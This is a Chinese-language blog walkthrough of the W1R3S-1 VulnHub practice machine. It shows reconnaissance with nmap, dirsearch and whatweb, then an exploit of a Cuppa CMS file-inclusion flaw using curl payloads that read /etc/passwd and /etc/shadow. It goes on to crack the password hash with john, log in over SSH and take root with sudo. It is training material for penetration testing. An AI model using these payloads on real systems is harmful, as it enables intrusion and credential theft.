W1R3S-1项目实战
前言
您受聘在W1R3S.inc单个服务器上进行渗透测试,并报告所有发现。他们要求您获得root访问权限并找到标志(位于/root目录中)。
难以获得低特权外壳:初级/中级
获得特权升级的难度:初级/中级
关于:这是一个易受攻击的Ubuntu盒子,给了你一些真实世界的场景,让我想起了OSCP实验室。
如果你需要任何提示、建议或有问题,请随时给我发电子邮件:在gmaildot.com上查看电线。
靶场环境
kali 192.168.31.153
w1r3s-1 192.168.31.42
靶机环境地址:https://www.vulnhub.com/entry/w1r3s-101,220/
渗透实战
信息收集
nmap扫描网段探测存活主机
nmap 192.168.31.0/24
发现了192.168.31.42,访问http://192.168.31.42,是一个普通的apache界面
使用nmap或者Zenmap扫描ip全端口信息,版本信息,操作系统信息
nmap 192.168.31.42 -sV -O -p- -A
-sV 扫描版本信息
-O 扫描操作系统
-p- 扫描全端口
-A 扫描详细信息
发现有ftp的21端口,并且允许匿名用户登录anonymous,展示了ftp下的三个文件
接着就是ssh的22端口,80端口和mysql的3306端口,并且3306端口并不是管理员端口
操作系统是ubuntu linux 3.x或者4.x版本
接着使用目录扫描器dirsearch简单枚举web页面
发现了/administrator/index.php,/wordpress/wp-login.php这俩目录
还有一点就是,扫描出的结果不能仅仅关注状态码为200的结果,可以看看301 302有些是可以跳转到其他地址的,访问http://192.168.31.42/administrator/index.php会跳转到http://192.168.31.42/administrator/installation/一个安装界面
使用whatweb扫描网站信息
whatweb http://192.168.31.42/administrator/installation/
发现网站是Apache2.4.18,Cuppa CMS 搭建的
到此就简单收集了端口信息和枚举了web页面
根据端口信息得到ftp的21端口可以匿名登录,我们使用ftp 192.168.31.42登录
ftp 192.168.31.42
anonymous //回车后需要输入密码,我们直接再回车一次匿名登录
ls
get content
登录成功但是无法提取文件,只能从web界面入手
渗透入侵
已知是Cuppa CMS搭建的系统,直接在https://www.exploit-db.com查找Cuppa此内容管理系统的历史漏洞,发现了有一个 本地/远程文件包含漏洞
看到左上角的EDB-ID:25971 是一家归档了的编号,可以拿到编号去kali使用searchsploit查找归档的信息或者脚本
查看poc提示,需要去包含一个文件,这里我直接访问/etc/passwd
http://192.168.31.42/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
发现并没有显示信息,可能是需要post访问
使用curl工具以post方式获取信息
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.42/administrator/alerts/alertConfigField.php
发现了w1r3s的用户和root有/bin/bash权限
现在已知用户,要去查找密码,我们继续获取/etc/shadow文件的密码信息
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.42/administrator/alerts/alertConfigField.php
发现有www-data和w1r3s的加密过的密码,因为只有w1r3s用户有权限,所以主要拿w1r3s的密码来爆破,这里使用kali自带的john工具爆破解密,先将用户和加密的密码复制到一个文本,再爆破
vim pass.txt
john --show pass.txt
得到密码是computer,前面已知有一个22端口,尝试登陆
ssh w1r3s@192.168.31.42
computer
提权
使用sudo su,输入密码直接登录
总结
信息收集:1.利用nmap扫描端口信息,2.dirsearch枚举web页面,3.whatweb探测网站信息
渗透webshell:1.cms漏洞获取敏感信息,2.john爆破获取w1r3s的密码,3.远程登录ssh获取webshell
提权:sudo提权
本文来自博客园,作者:Vice_2203,转载请注明原文链接:https://www.cnblogs.com/BlogVice-2203/p/17509979.html
